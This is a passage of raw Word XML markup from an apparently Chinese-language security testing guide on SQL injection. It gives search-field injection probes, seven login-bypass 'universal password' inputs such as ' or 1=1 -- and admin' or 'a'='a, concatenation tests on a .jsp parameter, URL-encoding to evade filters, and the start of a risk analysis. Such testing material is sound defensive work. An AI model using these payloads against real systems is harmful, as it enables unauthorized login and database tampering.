        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先搜索（</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），如果出错，说明</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>90%</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在这个漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CD0818" w14:textId="06C68C7F" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后搜索（</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），如果正常返回，说明</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>95%</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有洞了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC60A1" w14:textId="5CCD94CE" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再搜索一个关键字，比如（</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2006</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）吧，正常返回所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2006</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D3C725" w14:textId="4657AC0F" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再搜索（</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2006%'and 1=1 and '%'='</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和（</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2006%'and 1=2 and '%'='</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8BBB4B" w14:textId="462299D7" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过验证（常见的为管理登陆）也称万能密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D18F8"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1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1 or </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码：任意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D3AB26"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2)Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - -</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（或‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1 or </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - -</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(admin or 1=1 --) (MS SQL)(</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接输入用户名，不进行密码验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E59AE77"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3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">admin   </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码输入：’</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> or  </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1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186E704"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4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' or 'a'='a    </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码输入：任意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5971DA"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">(5) </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名输入：‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1 - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75717329"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6) </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1 - -  </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码输入：任意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5BEA3A"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7) </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1'or'1'='1'or'1'='1   </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码输入：任意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D357024" w14:textId="5BF30F17" w:rsidR="00847C17" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器连结字符串的语法不同，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MS SQL Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用符号</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来连结字符串，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用符号</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来连结：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BC9FA"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jsp?ProdName=Book</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03205ECE"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jsp?ProdName=B</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ook  </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B0A3A" w14:textId="427499A8"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jsp?ProdName=B</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ook  </w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回正常说明有</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD0B42" w14:textId="2E00DE85" w:rsidR="00A944EF" w:rsidRPr="00020762" w:rsidRDefault="00847C17" w:rsidP="00020762">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果应用程序已经过滤了’和</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等特殊字符，我们仍然可以在输入时过把字符转换成</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码（即字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码的</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制）来绕过检查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A6E82" w14:textId="2FBAFE4E" w:rsidR="00A944EF" w:rsidRPr="00020762" w:rsidRDefault="00C24790" w:rsidP="00020762">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00A944EF" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>在输入</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>和表单处</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>攻击者通过输入精心构造的</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>对数据库记录进行增删改查</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或直接获取服务器权限。攻击者实施</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击时大多借助自动化注入工具，如穿山甲、明小子、</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00963088" w:rsidRPr="00020762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
